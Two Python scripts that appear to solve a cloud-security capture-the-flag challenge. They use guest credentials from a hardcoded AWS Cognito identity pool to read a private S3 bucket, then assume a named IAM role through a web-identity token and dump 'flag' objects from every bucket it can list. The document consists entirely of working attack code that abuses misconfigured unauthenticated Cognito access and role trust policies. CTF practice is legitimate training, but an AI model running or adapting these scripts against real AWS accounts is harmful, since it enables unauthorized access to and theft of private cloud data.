#!/usr/bin/env python3 | |
import boto3 # type: ignore | |
import requests # type: ignore | |
REGION = "us-east-1"
# Cognito identity pool ids take the form "<region>:<uuid>"; the region prefix
# has to agree with REGION, which the client below is also created with.
IDENTITY_POOL_ID = f"{REGION}:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
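def main() -> None:
    """Download the "flag*" object from the private bucket with guest Cognito credentials.

    Flow: obtain an identity from the pool, exchange it for temporary AWS
    credentials, list the bucket, and fetch the last key that begins with
    "flag" through a presigned URL.

    Raises:
        SystemExit: if the bucket holds no key beginning with "flag".
        botocore.exceptions.ClientError: propagated from any AWS call that fails.
        requests.HTTPError: if the presigned download does not return a 2xx status.
    """
    client = boto3.client("cognito-identity", REGION)
    # No Logins map is passed, so this requests an unauthenticated (guest)
    # identity; the role the pool maps to guests decides what the credentials
    # below are allowed to do.
    identity_id = client.get_id(IdentityPoolId=IDENTITY_POOL_ID)["IdentityId"]
    credentials = client.get_credentials_for_identity(IdentityId=identity_id)["Credentials"]
    # pylint: disable=invalid-name
    s3 = boto3.client(
        "s3",
        aws_access_key_id=credentials["AccessKeyId"],
        aws_secret_access_key=credentials["SecretKey"],
        aws_session_token=credentials["SessionToken"],
        region_name=REGION,
    )
    bucket = "wiz-privatefiles"
    # "Contents" is absent from the response when the bucket is empty.
    objects = s3.list_objects(Bucket=bucket).get("Contents", [])
    flag_keys = [blob["Key"] for blob in objects if blob["Key"].startswith("flag")]
    if not flag_keys:
        raise SystemExit(f"no object starting with 'flag' in {bucket}")
    flag_key = flag_keys[-1]  # same choice as before: the last match wins
    payload = {"Bucket": bucket, "Key": flag_key}
    # The presigned URL embeds the session credentials in its query string;
    # treat it as a secret and keep it out of logs.
    presigned_url = s3.generate_presigned_url("get_object", payload)
    # A bounded timeout keeps a stalled download from hanging the script forever.
    response = requests.get(presigned_url, timeout=30)
    response.raise_for_status()
    print(response.text)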
# Script entry guard: run main() only when executed directly, not on import.
if __name__ == '__main__':
    main()
#!/usr/bin/env python3 | |
import sys

import boto3  # type: ignore
from botocore.exceptions import ClientError  # type: ignore
REGION = "us-east-1"
# Identity pool ids are "<region>:<uuid>"; the prefix must agree with REGION.
IDENTITY_POOL_ID = f"{REGION}:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
ROLE_NAME = "Cognito_s3accessAuth_Role"
# Fully qualified ARN of the role that main() assumes with the pool's OpenID token.
ROLE_ARN = f"arn:aws:iam::092297851374:role/{ROLE_NAME}"
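def main() -> None:
    """Assume ROLE_ARN via a Cognito OpenID token and print every readable "flag" object.

    Flow: obtain an identity from the pool, ask Cognito for an OpenID token
    for it, trade that token for role credentials with STS, then walk every
    bucket the role can list and print the body of the last key containing
    "flag". Buckets the role cannot list or read are reported on stderr and
    skipped; buckets with no matching key are skipped silently.

    Raises:
        botocore.exceptions.ClientError: propagated from the Cognito, STS and
            ListBuckets calls; per-bucket errors are handled inside the loop.
    """
    cognito = boto3.client("cognito-identity", REGION)
    # No Logins map is supplied, so this is an unauthenticated (guest) identity
    # and the OpenID token below is minted for it.
    identity_id = cognito.get_id(IdentityPoolId=IDENTITY_POOL_ID)["IdentityId"]
    token = cognito.get_open_id_token(IdentityId=identity_id)["Token"]
    sts = boto3.client("sts")
    # Succeeds only if ROLE_ARN's trust policy accepts this identity pool as a
    # web-identity principal; that trust relationship is what grants the role.
    assume_role = sts.assume_role_with_web_identity(
        RoleArn=ROLE_ARN,
        RoleSessionName="yolo",
        WebIdentityToken=token,
    )
    credentials = assume_role["Credentials"]
    session = boto3.Session(
        aws_access_key_id=credentials["AccessKeyId"],
        aws_secret_access_key=credentials["SecretAccessKey"],
        aws_session_token=credentials["SessionToken"],
        region_name=REGION,
    )
    # pylint: disable=invalid-name
    s3 = session.client("s3")
    buckets = [bucket["Name"] for bucket in s3.list_buckets()["Buckets"]]
    for bucket in buckets:
        try:
            # "Contents" is absent from the response when the bucket is empty.
            listing = s3.list_objects(Bucket=bucket).get("Contents", [])
            flag_keys = [blob["Key"] for blob in listing if "flag" in blob["Key"]]
            if not flag_keys:
                continue
            flag_path = flag_keys[-1]  # same choice as before: the last match wins
            flag_blob = s3.get_object(Bucket=bucket, Key=flag_path)["Body"]
            print(f"{bucket}:", flag_blob.read().decode().strip())
        except ClientError as err:
            # e.g. AccessDenied on list or get: report the skip instead of hiding it.
            code = err.response.get("Error", {}).get("Code", "ClientError")
            print(f"{bucket}: skipped ({code})", file=sys.stderr)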
# Script entry guard: run main() only when executed directly, not on import.
if __name__ == '__main__':
    main()